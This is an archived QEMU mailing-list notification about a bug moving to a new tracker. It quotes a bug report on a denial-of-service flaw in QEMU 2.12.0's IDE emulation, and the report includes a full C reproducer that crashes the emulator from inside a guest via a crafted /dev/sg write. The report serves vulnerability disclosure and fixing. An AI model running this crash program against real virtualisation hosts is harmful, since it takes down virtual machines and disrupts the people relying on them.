[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Bug 1777315] Re: IDE short PRDT abort
From: |
Thomas Huth |
Subject: |
[Bug 1777315] Re: IDE short PRDT abort |
Date: |
Fri, 30 Apr 2021 16:57:15 -0000 |
This is an automated cleanup. This bug report has been moved
to QEMU's new bug tracker on gitlab.com and thus gets marked
as 'expired' now. Please continue with the discussion here:
https://gitlab.com/qemu-project/qemu/-/issues/57
** Changed in: qemu
Status: In Progress => Expired
** Changed in: qemu
Assignee: John Snow (jnsnow) => (unassigned)
** Bug watch added: gitlab.com/qemu-project/qemu/-/issues #57
https://gitlab.com/qemu-project/qemu/-/issues/57
--
You received this bug notification because you are a member of qemu-
devel-ml, which is subscribed to QEMU.
https://bugs.launchpad.net/bugs/1777315
Title:
IDE short PRDT abort
Status in QEMU:
Expired
Bug description:
Hi,
QEMU 'hw/ide/core.c:871' Denial of Service Vulnerability in version
qemu-2.12.0
run the program in qemu-2.12.0:
#define _GNU_SOURCE
#include <endian.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <stdint.h>
#include <string.h>
static uintptr_t syz_open_dev(uintptr_t a0, uintptr_t a1, uintptr_t a2)
{
if (a0 == 0xc || a0 == 0xb) {
char buf[128];
sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block",
(uint8_t)a1, (uint8_t)a2);
return open(buf, O_RDWR, 0);
} else {
char buf[1024];
char* hash;
strncpy(buf, (char*)a0, sizeof(buf) - 1);
buf[sizeof(buf) - 1] = 0;
while ((hash = strchr(buf, '#'))) {
*hash = '0' + (char)(a1 % 10);
a1 /= 10;
}
return open(buf, a2, 0);
}
}
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};
void loop()
{
long res = 0;
memcpy((void*)0x20000000, "/dev/sg#", 9);
res = syz_open_dev(0x20000000, 0, 2);
if (res != -1)
r[0] = res;
res = syscall(__NR_dup2, r[0], r[0]);
if (res != -1)
r[1] = res;
*(uint8_t*)0x20000ec0 = 0;
*(uint8_t*)0x20000ec1 = 0;
*(uint8_t*)0x20000ec2 = 0;
*(uint8_t*)0x20000ec3 = 0;
*(uint32_t*)0x20000ec8 = 0;
*(uint8_t*)0x20000ed8 = 0;
*(uint8_t*)0x20000ed9 = 0;
*(uint8_t*)0x20000eda = 0;
*(uint8_t*)0x20000edb = 0;
memcpy((void*)0x20000ee0, "\x9c\x4d\xe7\xd5\x0a\x62\x43\xa7\x77\x53\x67\xb3",
12);
syscall(__NR_write, r[1], 0x20000ec0, 0x323);
}
int main()
{
syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0);
loop();
return 0;
}
this will crash qemu, output information:
qemu-system-x86_64: hw/ide/core.c:843: ide_dma_cb: Assertion `n * 512 ==
s->sg.size' failed.
Thanks
owl337
To manage notifications about this bug go to:
https://bugs.launchpad.net/qemu/+bug/1777315/+subscriptions
[Prev in Thread] |
Current Thread |
[Next in Thread] |
- [Bug 1777315] Re: IDE short PRDT abort,
Thomas Huth <=